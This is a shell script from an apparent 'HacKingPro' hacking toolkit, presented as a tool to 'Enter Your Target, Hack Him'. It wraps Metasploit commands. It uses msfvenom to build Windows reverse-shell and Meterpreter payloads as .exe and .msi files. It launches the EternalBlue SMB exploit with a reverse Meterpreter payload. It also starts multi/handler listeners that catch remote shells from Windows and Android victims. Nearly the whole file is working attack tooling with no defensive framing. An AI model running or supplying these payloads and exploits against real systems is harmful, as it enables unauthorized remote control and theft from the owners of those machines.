#!/bin/sh
#!/bin/bash
#!/usr/bin/sh
#!/usr/bin/bash
#!/usr/bin/env sh
#!/usr/bin/env bash
#!/data/data/com.termux/files/usr/bin/sh
#!/data/data/com.termux/files/usr/bin/bash
###############################################################
#                     Exploits / Payloads                     #
#-Info--------------------------------------------------------#
#    Enter Your Target, Hack Him, and Get Markdown Report     #
#-About-------------------------------------------------------#
#--╼▰[ Skils ]-╼▰[ MultiMan ]                                 #
#--╼▰[ Part of ]-╼▰[ HacKingPro ]                             #
#--╼▰[ Script Name ]-╼▰[ HacKingPro-Payloads ]                #
#--╼▰[ Author ]-╼▰[ AnLoMinus ]-╼▰[ Leon Yaakobov ]           #
###############################################################
# CREDIT: To All World Creators free Scripts & Tools          #
# BIG THANX TO ALL COMUNITY THAT SHARE ALL THAT FREE          #
# GREAT SCRIPTS                                               #
# Location: Made With LOVE IN ISRAEL !                        #
###############################################################
#-Metadata----------------------------------------------------#
#--╼▰[ Version ]-╼▰[ 1.0.0 ]                                  #
#--╼▰[ Source ]-╼▰[ https://github.com/AnLoMinus/HacKingPro ] #
#--╼▰[ Created ]-╼▰[ 19-08-2022 ]                             #
#--╼▰[ Update ]-╼▰[ 29-08-2022 ]                              #
###############################################################

######################################################
#------╼╼▰[ HacKingPro-Payloads ]--╼▰ [ Head ] #
######################################################

#------╼╼▰[ HacKingPro ]--╼▰ [ Payloads ]--╼▰

#------╼╼▰[ HacKingPro ]--╼▰ [ msfconsole ]--╼▰ [ Generic Payload Handler ]--╼▰ [ exploit/multi/handler ]
# Platform: Android, Apple_iOS, BSD, Java, JavaScript, Linux, OSX, NodeJS, PHP, Python, Ruby, Solaris, Unix, Windows, Mainframe, Multi
# Arch:     x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r

clear
ifconfig
echo "\n"
read -p "Enter Local IP:  " localIP
read -p "Enter Local PORT:  " localPORT
# [*] Starting reverse TCP handler on ${localIP}:${localPORT}

#------╼╼▰[ HacKingPro ]--╼▰ [ MetaSploit ]--╼▰ [ Payloads ]--╼▰ [ Windows ]
Metasploit_Windows_Payloads(){
  read -p "Enter Payload Name:  " PayloadNAME
  mkdir ${PayloadNAME}; cd ${PayloadNAME};
  mkdir ${localIP}; cd ${localIP};
  mkdir ${localPORT}; cd ${localPORT};
  #------╼╼▰[ HacKingPro ]--╼▰ [ MetaSploit ]--╼▰ [ Payloads ]--╼▰ [ Windows ]--╼▰ [ TCP Shell ]--╼▰ [ exe ]
  msfvenom -p windows/shell_reverse_tcp lhost=${localIP} lport=${localPORT} -f exe -o ${PayloadNAME}.exe
  #------╼╼▰[ HacKingPro ]--╼▰ [ MetaSploit ]--╼▰ [ Payloads ]--╼▰ [ Windows ]--╼▰ [ TCP Meterpreter ]--╼▰ [ exe ]
  msfvenom -p windows/meterpreter/reverse_tcp lhost=${localIP} lport=${localPORT}  -f exe -o ${PayloadNAME}.exe
  #------╼╼▰[ HacKingPro ]--╼▰ [ MetaSploit ]--╼▰ [ Payloads ]--╼▰ [ Windows ]--╼▰ [ TCP Meterpreter ]--╼▰ [ msi ]
  msfvenom -p windows/meterpreter/reverse_tcp lhost=${localIP} lport=${localPORT}  -f msi -o ${PayloadNAME}.msi
}
# To set up this environment, first create a payload using msfvenom:

#------╼╼▰[ HacKingPro ]--╼▰ [ MetaSploit ]--╼▰ [ Exploits ]--╼▰ [ Windows ]
msfconsole_Winndows_Exploit_smb_ms17_010_eternalblue(){
  msfconsole -q -x "use exploit/windows/smb/ms17_010_eternalblue;
  set payload windows/x64/meterpreter/reverse_tcp;
  set ProcessName explorer.exe;
  show options"
}

#------╼╼▰[ HacKingPro ]--╼▰ [ MetaSploit ]--╼▰ [ Listeners ]--╼▰ [ Windows ]
msfconsole_Winndows_Meterpreter_Reverse_TCP(){

  # Module options (exploit/multi/handler):
  # Payload options (windows/meterpreter/reverse_tcp):
  msfconsole -q -x "use multi/handler;
  set payload windows/meterpreter/reverse_tcp;
  set lhost ${localIP};
  set lport ${localPORT};
  run;"

  # [*] Starting reverse TCP handler on ${localIP}:${localPORT}
}

#------╼╼▰[ HacKingPro ]--╼▰ [ MetaSploit ]--╼▰ [ Listeners ]--╼▰ [ Android ]
msfconsole_Android_Meterpreter_Reverse_TCP(){
  msfconsole -q -x "use exploit/multi/handler;
  set payload android/meterpreter/reverse_tcp;
  set lhost $localIP;
  set lport ${localPORT};
  exploit"
}
